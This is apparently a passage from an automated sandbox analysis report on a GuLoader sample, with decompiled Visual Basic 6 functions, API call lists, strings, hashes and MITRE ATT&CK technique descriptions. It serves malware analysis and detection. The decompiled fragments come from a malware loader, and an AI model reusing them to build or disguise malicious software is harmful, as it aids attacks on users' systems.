0x00420f6e
0x00420f6f
0x00420f74
0x00420f81
0x00420f85
0x00420f8c
0x00420f90
0x00420f94
0x00420f98
0x00420f99
0x00420f9b
0x00420fa3
0x00420fac
0x00420fae
0x00420fb5
0x00420fb7
0x00420fbc
0x00420fc3
0x00420fc8
0x00420fd2
0x00420fd2
0x00420fd7
0x00420fde
0x00420fe5
0x00420fe6
0x00421028
0x00421030
0x00421035

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420D75
#535.MSVBVM60(?,?,?,?,00401546), ref: 00420DBF
__vbaNew2.MSVBVM60(0040257C,004233C0,?,?,?,?,00401546), ref: 00420DE1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,0000004C), ref: 00420E43
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 00420E95
__vbaFreeObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 00420EAC
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420ED2
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420EDC
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420EE4
#613.MSVBVM60(?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420F06
#632.MSVBVM60(?,?,000000E7,?,?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420F2A
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?,?,00000003), ref: 00420F4F
__vbaVarTstEq.MSVBVM60(00008008,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?), ref: 00420F6F
__vbaFreeVarList.MSVBVM60(00000006,00000003,?,?,00000003,?,00008008,00008008,?,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420F9B
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 00420FB7
#527.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420FC8
__vbaStrMove.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420FD2
__vbaFreeStr.MSVBVM60(00421036), ref: 00421028
__vbaFreeStr.MSVBVM60(00421036), ref: 00421030

Strings

Cryptodeist, xrefs: 00420FC3

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#527#535#613#632#702#704ChkstkErrorListNew2
String ID: Cryptodeist
API String ID: 3497234973-3010629389
Opcode ID: b10f57a1c97deeca2187a7ff7cacf6ff9b5cf014c41363bd2f4941ebe49adf2a
Instruction ID: dce62ce52de096da41d1d286f0e94f5423bb2f564f630d857fe05d305221a761
Opcode Fuzzy Hash: b10f57a1c97deeca2187a7ff7cacf6ff9b5cf014c41363bd2f4941ebe49adf2a
Instruction Fuzzy Hash: 297139B1900218EBDB10DF95CE45BDDB7B8AF04314F6086AAE115B71E1DB785B88CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00420709, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00420709(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v68;
				signed int _t39;
				signed int _t43;
				signed int _t49;
				intOrPtr _t66;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_t39 = 0x30;
				L00401540();
				_v12 = _t66;
				_v8 = 0x4013e0;
				L00401612();
				L0040183A();
				_push(_t39);
				_push(L"Skimmia");
				L0040172C();
				asm("sbb eax, eax");
				_v40 =  ~( ~_t39 + 1);
				L00401846();
				_t43 = _v40;
				if(_t43 != 0) {
					_push(0x47);
					L00401786();
					L0040183A();
					if( *0x4233c0 != 0) {
						_v60 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v60 = 0x4233c0;
					}
					_v40 =  *_v60;
					_t49 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
					asm("fclex");
					_v44 = _t49;
					if(_v44 >= 0) {
						_v64 = _v64 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40256c);
						_push(_v40);
						_push(_v44);
						L004017C8();
						_v64 = _t49;
					}
					_v48 = _v36;
					_t43 =  *((intOrPtr*)( *_v48 + 0x138))(_v48, L"Printermanualen", 1);
					asm("fclex");
					_v52 = _t43;
					if(_v52 >= 0) {
						_v68 = _v68 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x40258c);
						_push(_v48);
						_push(_v52);
						L004017C8();
						_v68 = _t43;
					}
					L004017C2();
				}
				_v24 = 0x5a4c00;
				_push(0x420859);
				L00401846();
				return _t43;
			}

0x0042070e
0x00420719
0x0042071a
0x00420723
0x00420724
0x0042072c
0x0042072f
0x00420736
0x00420740
0x00420745
0x00420746
0x0042074b
0x00420752
0x00420757
0x0042075e
0x00420763
0x00420769
0x0042076f
0x00420771
0x0042077b
0x00420787
0x004207a1
0x00420789
0x00420789
0x0042078e
0x00420793
0x00420798
0x00420798
0x004207ad
0x004207bc
0x004207bf
0x004207c1
0x004207c8
0x004207e1
0x004207ca
0x004207ca
0x004207cc
0x004207d1
0x004207d4
0x004207d7
0x004207dc
0x004207dc
0x004207e8
0x004207fa
0x00420800
0x00420802
0x00420809
0x00420825
0x0042080b
0x0042080b
0x00420810
0x00420815
0x00420818
0x0042081b
0x00420820
0x00420820
0x0042082c
0x0042082c
0x00420831
0x00420838
0x00420853
0x00420858

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420724
#669.MSVBVM60(?,?,?,?,00401546), ref: 00420736
__vbaStrMove.MSVBVM60(?,?,?,?,00401546), ref: 00420740
__vbaStrCmp.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042074B
__vbaFreeStr.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042075E
#537.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420771
__vbaStrMove.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042077B
__vbaNew2.MSVBVM60(0040257C,004233C0,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420793
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000014,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004207D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000138,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042081B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042082C
__vbaFreeStr.MSVBVM60(00420859,Skimmia,00000000,?,?,?,?,00401546), ref: 00420853

Strings

Printermanualen, xrefs: 004207ED
Skimmia, xrefs: 00420746

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#537#669ChkstkNew2
String ID: Printermanualen$Skimmia
API String ID: 2004920347-2169568590
Opcode ID: 9013915033e4d9dba331dc661c9ba74d9ca728f212bc9373c42e7d1b1a03840a
Instruction ID: e356c4196bb8c8ecc4bb673df4dbe43ca2309fbc524f6f4173262647664517be
Opcode Fuzzy Hash: 9013915033e4d9dba331dc661c9ba74d9ca728f212bc9373c42e7d1b1a03840a
Instruction Fuzzy Hash: 2E310E71A50218AFDB00EFA5D985BEDBBF4BF08705F60442AF001B71E1DBB85A45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1CC, Relevance: 22.6, APIs: 15, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F1E8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F212
__vbaVarDup.MSVBVM60 ref: 0041F239
#607.MSVBVM60(?,000000BB,?), ref: 0041F24B
__vbaStrVarMove.MSVBVM60(?,?,000000BB,?), ref: 0041F254
__vbaStrMove.MSVBVM60(?,?,000000BB,?), ref: 0041F25E
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,000000BB,?), ref: 0041F26D
#717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041F28E
__vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F297
__vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F2A1
__vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F2A9
__vbaFreeStr.MSVBVM60(0041F2EC,?,?,?,?,00401546), ref: 0041F2CB
__vbaAryDestruct.MSVBVM60(00000000,?,0041F2EC,?,?,?,?,00401546), ref: 0041F2D6
__vbaFreeStr.MSVBVM60(00000000,?,0041F2EC,?,?,?,?,00401546), ref: 0041F2DE
__vbaFreeStr.MSVBVM60(00000000,?,0041F2EC,?,?,?,?,00401546), ref: 0041F2E6

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#607#717ChkstkCopyDestructList
String ID:
API String ID: 1752509113-0
Opcode ID: 459445a97f8b3ad14ffa8020c3c5cd4798faf9326c757c550f6f7519e0fa97fc
Instruction ID: a3c2e6ee44ae612ee87ea3e3762df6b294b9b9bc7a3ddb4073b526b10a8a5f35
Opcode Fuzzy Hash: 459445a97f8b3ad14ffa8020c3c5cd4798faf9326c757c550f6f7519e0fa97fc
Instruction Fuzzy Hash: D031DE76900149ABDB00FBD1C986BDEB7B9AF04704F50843AB505B71E1EB786B09CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041FFF9, Relevance: 16.5, APIs: 11, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041FFF9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v52;
				char* _t24;
				void* _t38;
				void* _t40;
				intOrPtr _t41;

				_t41 = _t40 - 0xc;
				 *[fs:0x0] = _t41;
				L00401540();
				_v16 = _t41;
				_v12 = 0x4013c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401546, _t38);
				L004017B6();
				L004017B6();
				_push( &_v52);
				L00401636();
				_t24 =  &_v52;
				_push(_t24);
				L00401834();
				L0040183A();
				L00401828();
				L00401630();
				_push(0x4200a1);
				L00401846();
				L00401846();
				L00401846();
				return _t24;
			}

0x0041fffc
0x0042000b
0x00420015
0x0042001d
0x00420020
0x00420027
0x00420036
0x0042003f
0x0042004a
0x00420052
0x00420053
0x00420058
0x0042005b
0x0042005c
0x00420066
0x0042006e
0x00420073
0x00420078
0x0042008b
0x00420093
0x0042009b
0x004200a0

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420015
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0042003F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0042004A
#612.MSVBVM60(?,?,?,?,?,00401546), ref: 00420053
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042005C
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420066
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042006E
#554.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420073
__vbaFreeStr.MSVBVM60(004200A1,?,?,?,?,?,?,00401546), ref: 0042008B
__vbaFreeStr.MSVBVM60(004200A1,?,?,?,?,?,?,00401546), ref: 00420093
__vbaFreeStr.MSVBVM60(004200A1,?,?,?,?,?,?,00401546), ref: 0042009B

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyMove$#554#612Chkstk
String ID:
API String ID: 3453574145-0
Opcode ID: 43f5f6388376c3b2e81e2b6bd4b06cbef4dcf00708822c74de8b3f5dcab3bcdf
Instruction ID: 439221e0665cd71e71b5f23c87b8ffe39d0ba9be8ae32197059632dc8ba48082
Opcode Fuzzy Hash: 43f5f6388376c3b2e81e2b6bd4b06cbef4dcf00708822c74de8b3f5dcab3bcdf
Instruction Fuzzy Hash: 3B11FA31900159ABCB00FFA2D886EDEB7B4BF04708F50852AB501771E1EB3CAA05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00421457, Relevance: 13.6, APIs: 9, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00421457(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				short _v36;
				char _v52;
				char _v68;
				char* _t29;
				void* _t39;
				void* _t41;
				intOrPtr _t42;

				_t42 = _t41 - 0xc;
				 *[fs:0x0] = _t42;
				L00401540();
				_v16 = _t42;
				_v12 = 0x4014d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401546, _t39);
				L004017B6();
				_push(0x5745);
				_push( &_v52);
				L0040167E();
				_push( &_v52);
				_push( &_v68);
				L004015E2();
				_push( &_v68);
				L00401834();
				L0040183A();
				_push( &_v68);
				_t29 =  &_v52;
				_push(_t29);
				_push(2);
				L00401840();
				_v36 = 0x253;
				_push(0x421513);
				L00401846();
				L00401846();
				return _t29;
			}

0x0042145a
0x00421469
0x00421473
0x0042147b
0x0042147e
0x00421485
0x00421494
0x0042149d
0x004214a2
0x004214aa
0x004214ab
0x004214b3
0x004214b7
0x004214b8
0x004214c0
0x004214c1
0x004214cb
0x004214d3
0x004214d4
0x004214d7
0x004214d8
0x004214da
0x004214e2
0x004214e8
0x00421505
0x0042150d
0x00421512

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421473
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0042149D
#698.MSVBVM60(?,00005745,?,?,?,?,00401546), ref: 004214AB
#520.MSVBVM60(?,?,?,00005745,?,?,?,?,00401546), ref: 004214B8
__vbaStrVarMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004214C1
__vbaStrMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004214CB
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00005745,?,?,?,?,00401546), ref: 004214DA
__vbaFreeStr.MSVBVM60(00421513), ref: 00421505
__vbaFreeStr.MSVBVM60(00421513), ref: 0042150D

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#520#698ChkstkCopyList
String ID:
API String ID: 415313431-0
Opcode ID: 8848cba7e68a1664808ab13cd7f780d1af0880905ea086a741801fa9964815c0
Instruction ID: fb32c2c20c580177067764350c523afabaa10c7d23ccd0873e7aa71285fe28d7
Opcode Fuzzy Hash: 8848cba7e68a1664808ab13cd7f780d1af0880905ea086a741801fa9964815c0
Instruction Fuzzy Hash: 7E11D071900218BBCB00FF91DD86EEEB7BCBF44748F54846AF501A71A1EB789605CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041F931, Relevance: 13.6, APIs: 9, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F94D
#707.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F975
__vbaStrMove.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F97F
#593.MSVBVM60(0000000A), ref: 0041F99C
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041F9A7
#537.MSVBVM60(0000003B,0000000A), ref: 0041F9AE
__vbaStrMove.MSVBVM60(0000003B,0000000A), ref: 0041F9B8
__vbaFreeStr.MSVBVM60(0041F9DF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F9D1
__vbaFreeStr.MSVBVM60(0041F9DF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F9D9

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#537#593#707Chkstk
String ID:
API String ID: 2467297632-0
Opcode ID: 632d32fee1b8f1797e0d049224bc9a60f7f04fbeef37f0513300f7ba88747e93
Instruction ID: c4988cf8c628a6fe291ed86bdd87209bd66cbafdca4efa16b43d7bf6c8575c25
Opcode Fuzzy Hash: 632d32fee1b8f1797e0d049224bc9a60f7f04fbeef37f0513300f7ba88747e93
Instruction Fuzzy Hash: 8A112E71940209ABDB01FBA1CC42BDE7BB4AF00708F10803AB501BB1E1DB7C9645CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041F30B, Relevance: 12.0, APIs: 8, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0041F30B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				long long _v40;
				char _v48;
				signed char _t22;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t32 = _t31 - 0xc;
				 *[fs:0x0] = _t32;
				L00401540();
				_v16 = _t32;
				_v12 = 0x401358;
				_v8 = 0;
				_t22 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401546, _t29);
				L004017B6();
				asm("fabs");
				asm("fnstsw ax");
				if((_t22 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				L00401666();
				_v40 = __fp0;
				_v48 = 5;
				__eax =  &_v48;
				_push(__eax);
				L0040166C();
				L0040183A();
				L00401828();
				asm("wait");
				_push(0x41f3b0);
				L00401846();
				L00401846();
				return __eax;
			}

0x0041f30e
0x0041f31d
0x0041f327
0x0041f32f
0x0041f332
0x0041f339
0x0041f348
0x0041f351
0x0041f35c
0x0041f35e
0x0041f362
0x0040154c
0x0040154c
0x0041f364
0x0041f369
0x0041f36c
0x0041f373
0x0041f376
0x0041f377
0x0041f381
0x0041f389
0x0041f38e
0x0041f38f
0x0041f3a2
0x0041f3aa
0x0041f3af

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F327
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F351
__vbaFPFix.MSVBVM60(?,?,?,?,00401546), ref: 0041F364
#536.MSVBVM60(00000005), ref: 0041F377
__vbaStrMove.MSVBVM60(00000005), ref: 0041F381
__vbaFreeVar.MSVBVM60(00000005), ref: 0041F389
__vbaFreeStr.MSVBVM60(0041F3B0,00000005), ref: 0041F3A2
__vbaFreeStr.MSVBVM60(0041F3B0,00000005), ref: 0041F3AA

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536ChkstkCopyMove
String ID:
API String ID: 983360083-0
Opcode ID: 14b4511f92ca944757917464b0185463b4719737461eb90aa5028450b62fcfa8
Instruction ID: aaca613955583b0ae086304bc2a68e01b24b1506ba8bd255faaa9f50a7a84828
Opcode Fuzzy Hash: 14b4511f92ca944757917464b0185463b4719737461eb90aa5028450b62fcfa8
Instruction Fuzzy Hash: ED113C71800209ABCB00FFA5C956BDEBBB8BF05748F10806AF411771E1DB389A058B59

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 20211129.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: 20211129.exe PID: 456 Parent PID: 6016

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: 20211129.exe PID: 456 Parent PID: 6016 20211129.exeCOMMON

Executed Functions

Function 0041C7D4, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267
COMMON

Function 004200C0, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416
COMMON

Function 0041DE8C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184
COMMON

Function 00420874, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307
COMMON

Function 0041EC5D, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85
COMMON

Function 0042153C, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58
COMMON

Function 00421626, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Function 00401888, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153
COMMON

Function 0042105D, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225
COMMON

Function 0041F9FE, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196
COMMON

Function 0041FD60, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159
COMMON

Function 0041EF2A, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179
COMMON

Function 0041F3D4, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204
COMMON

Function 0041F70E, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130
COMMON

Function 0041ED99, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95
COMMON

Function 00420D57, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165
COMMON

Function 00420709, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95
COMMON

Function 0041FFF9, Relevance: 16.5, APIs: 11, Instructions: 47
COMMON

Function 00421457, Relevance: 13.6, APIs: 9, Instructions: 53
COMMON

Function 0041F30B, Relevance: 12.0, APIs: 8, Instructions: 48
COMMON